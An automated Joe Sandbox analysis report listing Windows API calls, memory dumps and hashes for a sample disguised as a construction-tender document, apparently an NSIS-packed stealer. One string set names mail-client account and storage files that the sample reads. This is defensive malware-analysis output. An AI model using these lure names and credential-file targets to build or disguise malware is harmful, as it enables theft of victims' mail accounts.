                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,332B6FFD,00000000,?,?,?,332B8A72,?,?,00000100), ref: 332B887B
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,332B8A72,?,?,00000100,5EFC4D8B,?,?), ref: 332B8901
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 332B89FB
                                                                                                                          • __freea.LIBCMT ref: 332B8A08
                                                                                                                            • Part of subcall function 332B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 332B5702
                                                                                                                          • __freea.LIBCMT ref: 332B8A11
                                                                                                                          • __freea.LIBCMT ref: 332B8A36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1414292761-0
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 332B1038
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 332B104B
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 332B1061
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 332B1075
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 332B1090
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 332B10B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3594823470-0
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,332B3518,332B23F1,332B1F17), ref: 332B3864
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 332B3872
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 332B388B
                                                                                                                          • SetLastError.KERNEL32(00000000,?,332B3518,332B23F1,332B1F17), ref: 332B38DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,332B6C6C), ref: 332B5AFA
                                                                                                                          • _free.LIBCMT ref: 332B5B2D
                                                                                                                          • _free.LIBCMT ref: 332B5B55
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,332B6C6C), ref: 332B5B62
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,332B6C6C), ref: 332B5B6E
                                                                                                                          • _abort.LIBCMT ref: 332B5B74
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3160817290-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 332B1E89: lstrlenW.KERNEL32(?,?,?,?,?,332B10DF,?,?,?,00000000), ref: 332B1E9A
                                                                                                                            • Part of subcall function 332B1E89: lstrcatW.KERNEL32(?,?,?,332B10DF,?,?,?,00000000), ref: 332B1EAC
                                                                                                                            • Part of subcall function 332B1E89: lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EB3
                                                                                                                            • Part of subcall function 332B1E89: lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EC8
                                                                                                                            • Part of subcall function 332B1E89: lstrcatW.KERNEL32(?,332B10DF,?,332B10DF,?,?,?,00000000), ref: 332B1ED3
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 332B122A
                                                                                                                            • Part of subcall function 332B173A: _strlen.LIBCMT ref: 332B1855
                                                                                                                            • Part of subcall function 332B173A: _strlen.LIBCMT ref: 332B1869
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                          • wsprintfW.USER32 ref: 00404A9A
                                                                                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s$&B
                                                                                                                          • API String ID: 3540041739-2907463167
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406283
                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406297
                                                                                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 004062AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: *?|<>/":
                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                                                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                          • String ID: 8
                                                                                                                          • API String ID: 1453599865-4194326291
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,332B4AEA,?,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000), ref: 332B4B59
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 332B4B6C
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,332B4AEA,?,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000,00000001,332B2082), ref: 332B4B8F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1941528284-0
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 332B1607
                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,332B190E,?,?,00000000,?,00000000), ref: 332B1643
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,332B190E,?,?,00000000,?,00000000,?,?,?,?), ref: 332B165A
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,332B190E,?,?,00000000,?,00000000,?,?,?,?,?), ref: 332B1661
                                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,332B190E,?,?,00000000,?,00000000,?,?,?,?), ref: 332B1686
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcatlstrlen$_strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3802368996-0
                                                                                                                          • Opcode ID: bee4ca4aa30fead6ea417435c2dc8e267d43d1a7c28d7b15eaf62bd3f7ef0030
                                                                                                                          • Instruction ID: aeafe91e631b384c37b764d66dd06f21ba76b09e5dfe78acccef77bdb5f51871
                                                                                                                          • Opcode Fuzzy Hash: bee4ca4aa30fead6ea417435c2dc8e267d43d1a7c28d7b15eaf62bd3f7ef0030
                                                                                                                          • Instruction Fuzzy Hash: A1219836D00304ABDB059F54DC85EEE77B8EF88750F14842AE605EB141EB74A58687A5
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 332B715C
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 332B717F
                                                                                                                            • Part of subcall function 332B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 332B5702
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 332B71A5
                                                                                                                          • _free.LIBCMT ref: 332B71B8
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 332B71C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 336800556-0
                                                                                                                          • Opcode ID: 2dc11ae8fbde734a8a26f8ada86a1a7ef9e0c8c1b8ddc2aeb2dead4f4db8fbec
                                                                                                                          • Instruction ID: 556e4019f012f3c00b701b3a5a81175f44799e9bfb6ac112ced8ef880bc9064e
                                                                                                                          • Opcode Fuzzy Hash: 2dc11ae8fbde734a8a26f8ada86a1a7ef9e0c8c1b8ddc2aeb2dead4f4db8fbec
                                                                                                                          • Instruction Fuzzy Hash: 4B0188B6A21B157F6B111ABE4C4CD7B6E7DDEC6EE03544529BD04DB340EE608C4291B0
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                                                                                          • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                                                                                          • Opcode Fuzzy Hash: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                                                                                          • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,332B636D,332B5713,00000000,?,332B2249,?,?,332B1D66,00000000,?,?,00000000), ref: 332B5B7F
                                                                                                                          • _free.LIBCMT ref: 332B5BB4
                                                                                                                          • _free.LIBCMT ref: 332B5BDB
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B5BE8
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B5BF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3170660625-0
                                                                                                                          • Opcode ID: c9cee85c0ea4d6b9b2b485a1fc5bd71c47eaf98e29e66177fa9fff693d32df30
                                                                                                                          • Instruction ID: 15135f4e011ac0c964d43010eccd39c2d0062fae2ada580c87943bf183537bc2
                                                                                                                          • Opcode Fuzzy Hash: c9cee85c0ea4d6b9b2b485a1fc5bd71c47eaf98e29e66177fa9fff693d32df30
                                                                                                                          • Instruction Fuzzy Hash: 9801F47A605B02AFEE032A349C88D5F2ABE9FC56F07344524F955AE145EEB488C34164
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,332B10DF,?,?,?,00000000), ref: 332B1E9A
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,332B10DF,?,?,?,00000000), ref: 332B1EAC
                                                                                                                          • lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EB3
                                                                                                                          • lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EC8
                                                                                                                          • lstrcatW.KERNEL32(?,332B10DF,?,332B10DF,?,?,?,00000000), ref: 332B1ED3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 493641738-0
                                                                                                                          • Opcode ID: 6a2012f4ce73ba8e63057cd5b2712d2bfebd42ecd816d6ff82e03a9c7262a978
                                                                                                                          • Instruction ID: 1815f65dc6c5c97ea6f2bdcc7cd13bb7b8643788acb879e3c5e0472ab15ac79c
                                                                                                                          • Opcode Fuzzy Hash: 6a2012f4ce73ba8e63057cd5b2712d2bfebd42ecd816d6ff82e03a9c7262a978
                                                                                                                          • Instruction Fuzzy Hash: B1F08926500214BAD6213B19EC89EBF7B7CEFC5BA0F444419F50893190EB55684393F5
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 332B91D0
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B91E2
                                                                                                                          • _free.LIBCMT ref: 332B91F4
                                                                                                                          • _free.LIBCMT ref: 332B9206
                                                                                                                          • _free.LIBCMT ref: 332B9218
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 9caf3fd69cf1ba5ef26b105286d8ef33565ca21a20ff21aa312997c5c9f8edb3
                                                                                                                          • Instruction ID: c63366983e4c2ee629625164b82e868f1f56007f8dd8d33f5a6b185025a7bbfc
                                                                                                                          • Opcode Fuzzy Hash: 9caf3fd69cf1ba5ef26b105286d8ef33565ca21a20ff21aa312997c5c9f8edb3
                                                                                                                          • Instruction Fuzzy Hash: 77F06DB1A142419B8E50EB5AE6C8C0A7FF9EE047A13A44C05F949EB904CB74F8C09EA0
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
